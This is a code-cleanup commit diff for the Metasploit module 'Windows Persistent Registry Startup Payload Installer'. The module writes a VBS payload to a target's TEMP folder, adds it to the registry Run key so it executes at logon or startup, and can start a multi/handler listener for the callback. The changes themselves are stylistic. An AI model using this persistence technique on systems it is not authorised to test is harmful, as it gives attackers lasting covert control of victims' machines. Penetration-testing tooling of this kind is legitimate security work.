Clean up module

Author: wvu

modules/exploits/windows/local/persistence.rb

@@ -11,37 +11,38 @@
 require 'msf/core/post/windows/registry'
 require 'msf/core/exploit/exe'
 
-class Metasploit3 < Msf::Exploit::Local
+class Metasploit4 < Msf::Exploit::Local
+
   Rank = ExcellentRanking
 
   include Msf::Post::Common
   include Msf::Post::File
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Registry
-  include Exploit::EXE
+  include Msf::Exploit::EXE
 
-  def initialize(info={})
-    super( update_info( info,
-      'Name'          => 'Windows Persistent Registry Startup Payload Installer',
-      'Description'   => %q{
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Windows Persistent Registry Startup Payload Installer',
+      'Description'    => %q{
         This module will install a payload that is executed during boot.
         It will be executed either at user logon or system startup via the registry
         value in "CurrentVersion\Run" (depending on privilege and selected method).
       },
-      'License'       => MSF_LICENSE,
-      'Author'        =>
+      'License'        => MSF_LICENSE,
+      'Author'         =>
         [
           'Carlos Perez <carlos_perez[at]darkoperator.com>',
-          'g0tmi1k'   # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
+          'g0tmi1k' # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
         ],
-      'Platform'      => [ 'win' ],
-      'SessionTypes'  => [ 'meterpreter' ],
-      'Targets'       => [ [ 'Windows', {} ] ],
-      'DefaultTarget' => 0,
-      'DisclosureDate'=> "Oct 19 2011",
-      'DefaultOptions'=>
+      'Platform'       => [ 'win' ],
+      'SessionTypes'   => [ 'meterpreter' ],
+      'Targets'        => [ [ 'Windows', {} ] ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => "Oct 19 2011",
+      'DefaultOptions' =>
         {
-          'DisablePayloadHandler' => 'true',
+          'DisablePayloadHandler' => 'true'
         }
     ))
 
@@ -62,9 +63,9 @@ def initialize(info={})
 
     register_advanced_options([
       OptBool.new('HANDLER',
-        [ false, 'Start an exploit/multi/handler job to receive the connection', false]),
+        [false, 'Start an exploit/multi/handler job to receive the connection', false]),
       OptBool.new('EXEC_AFTER',
-        [ false, 'Execute persistent script after installing.', false])
+        [false, 'Execute persistent script after installing.', false])
     ], self.class)
   end
 
@@ -75,29 +76,29 @@ def exploit
     rexe_name = datastore['EXE_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
     reg_val   = datastore['REG_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
     startup   = datastore['STARTUP'].downcase
-    delay = datastore['DELAY'] || 10
-    exc_after = datastore['EXEC_AFTER'] || false
-    handler = datastore['HANDLER'] || false
+    delay = datastore['DELAY']
+    exec_after = datastore['EXEC_AFTER']
+    handler = datastore['HANDLER']
     @clean_up_rc = ""
 
     rvbs_name = rvbs_name + '.vbs' if rvbs_name[-4,4] != '.vbs'
     rexe_name = rexe_name + '.exe' if rexe_name[-4,4] != '.exe'
 
     # Connect to the session
     begin
-      host, port = session.session_host, session.session_port
+      host = session.session_host
       print_status("Running persistent module against #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
     rescue => e
-      print_error("Could not connect to session")
+      print_error("Could not connect to session: #{e}")
       return nil
     end
 
     # Check values
-    if (is_system?) && (startup == 'user')
+    if is_system? && startup == 'user'
       print_warning('Note: Current user is SYSTEM & STARTUP == USER. This user may not login often!')
     end
 
-    if (handler) && (!datastore['DisablePayloadHandler'])
+    if handler && !datastore['DisablePayloadHandler']
       # DisablePayloadHandler will stop listening after the script finishes - we want a job so it continues afterwards!
       print_warning("Note: HANDLER == TRUE && DisablePayloadHandler == TRUE. This will create issues...")
       print_warning("Disabling HANDLER...")
@@ -141,7 +142,7 @@ def exploit
     end
 
     # Do we execute the VBS script afterwards?
-    target_exec(script_on_target) if datastore['EXEC_AFTER']
+    target_exec(script_on_target) if exec_after
 
     # Create 'clean up' resource file
     clean_rc = log_file()
@@ -170,12 +171,12 @@ def write_script_to_target(vbs, name)
     temppath = datastore['PATH'] || session.sys.config.getenv('TEMP')
     filepath = temppath + "\\" + filename
 
-    if !directory? temppath
+    unless directory?(temppath)
       print_error("#{temppath} does not exists on the target")
       return nil
     end
 
-    if file? filepath
+    if file?(filepath)
       print_warning("#{filepath} already exists on the target. Deleting...")
       begin
         file_rm(filepath)
@@ -198,7 +199,7 @@ def write_script_to_target(vbs, name)
       filepath = nil
     end
 
-    return filepath
+    filepath
   end
 
   # Installs payload in to the registry HKLM or HKCU
@@ -216,16 +217,15 @@ def write_to_reg(key, script_on_target, registry_value)
       regsuccess = false
     end
 
-    return regsuccess
+    regsuccess
   end
 
-
   # Executes script on target and returns true if it was successfully started
   def target_exec(script_on_target)
     execsuccess = true
     print_status("Executing script #{script_on_target}")
     # Lets give the target a few seconds to catch up...
-    sleep(3)
+    Rex.sleep(3)
 
     # Error handling for process.execute() can throw a RequestError in send_request.
     begin
@@ -239,7 +239,7 @@ def target_exec(script_on_target)
       execsuccess = false
     end
 
-    return execsuccess
+    execsuccess
   end
 
   # Starts a exploit/multi/handler session
@@ -248,7 +248,8 @@ def create_multihandler(lhost, lport, payload_name)
     pay.datastore['LHOST'] = lhost
     pay.datastore['LPORT'] = lport
     print_status('Starting exploit/multi/handler')
-    if !check_for_listener(lhost, lport)
+
+    unless check_for_listener(lhost, lport)
       # Set options for module
       mh = client.framework.exploits.create('multi/handler')
       mh.share_datastore(pay.datastore)
@@ -260,19 +261,19 @@ def create_multihandler(lhost, lport, payload_name)
       mh.options.validate(mh.datastore)
       # Execute showing output
       mh.exploit_simple(
-          'Payload'     => mh.datastore['PAYLOAD'],
-          'LocalInput'  => self.user_input,
-          'LocalOutput' => self.user_output,
-          'RunAsJob'    => true
-        )
+        'Payload'     => mh.datastore['PAYLOAD'],
+        'LocalInput'  => self.user_input,
+        'LocalOutput' => self.user_output,
+        'RunAsJob'    => true
+      )
 
       # Check to make sure that the handler is actually valid
       # If another process has the port open, then the handler will fail
       # but it takes a few seconds to do so.  The module needs to give
       # the handler time to fail or the resulting connections from the
       # target could end up on on a different handler with the wrong payload
       # or dropped entirely.
-      select(nil, nil, nil, 5)
+      Rex.sleep(5)
       return nil if framework.jobs[mh.job_id.to_s].nil?
 
       return mh.job_id.to_s
@@ -296,7 +297,7 @@ def check_for_listener(lhost, lport)
         end
       end
     end
-    return false
+    false
   end
 
   # Function for creating log folder and returning log path
@@ -310,18 +311,18 @@ def log_file(log_path = nil)
     # Create a directory for the logs
     if log_path
       logs = ::File.join(log_path, 'logs', 'persistence',
-                         Rex::FileUtils.clean_path(host + filenameinfo) )
+                         Rex::FileUtils.clean_path(host + filenameinfo))
     else
       logs = ::File.join(Msf::Config.log_directory, 'persistence',
-                         Rex::FileUtils.clean_path(host + filenameinfo) )
+                         Rex::FileUtils.clean_path(host + filenameinfo))
     end
 
     # Create the log directory
     ::FileUtils.mkdir_p(logs)
 
     # logfile name
     logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + ".rc"
-    return logfile
+    logfile
   end
 
 end